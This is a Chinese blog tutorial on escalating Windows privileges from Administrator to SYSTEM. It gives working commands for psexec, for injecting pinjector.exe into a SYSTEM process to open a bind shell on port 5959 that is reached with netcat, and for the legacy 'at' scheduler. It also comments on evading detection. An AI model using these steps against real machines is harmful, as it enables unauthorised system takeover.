欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页

提权--windows

程序员文章站 2022-07-15 13:11:52
...

Windows权限

用户有三种:Users,Administrator,System
提权是将本地拥有administrator权限用户提权到system用户


windows基础提权命令

查看系统信息:systeminfo|findstr /B /C:”OS名称” /C:”OS版本”
主机名:hostname
环境变量:set
查看用户信息:net user
查看服务pid号:tasklist /svc | find “TermService”
查看端口:Netstat -ano | find “1488”


使用微软官方工具SysinternalsSuite提权

下载工具地址:[https://docs.microsoft.com/zh-cn/sysinternals/downloads/sysinternals-suite]
容易被排查,但是不会报毒

将psexec.exe放入到windows\system32下
提权--windows
执行命令,-i 交互式;-s远程执行

psExec.exe -i -s cmd

提权--windows


进程注入(pinjector.exe)提权

进程注入将pinjector注入到用户的进程里一起运行,进而同时拥有了对应的权限。
是一种比较隐蔽的手段,不会创建新的进程,很难发现,但是上传至目标主机时可能会报毒

从http://www.tarasco.org/security/Process_Injector/ 下载pinjector.exe文件。
放到主机的c盘根目录下

  Pinjector.exe -l 列出进程,列出的所有进程都可以利用(找system对应权限的进程)

提权--windows

 pinjector.exe -p 456 cmd 5959

提权--windows
然后查看到端口5959出于侦听状态,注入成功
提权--windows
Kali中使用nc工具

  nc -nv 192.168.3.83 5959

执行whoami命令,可以看到目前是system权限
提权--windows


Win 2003使用at命令提权

at命令 系统调度任务的指令,会调用system指令完成任务
指定一个时间,操作系统自动执行一个命令

  at 18:13 /interactive cmd   #18:13分执行一个交互式的cmd

提权--windows
如果尝试使用win7,使用at命令不允许交互式
提权--windows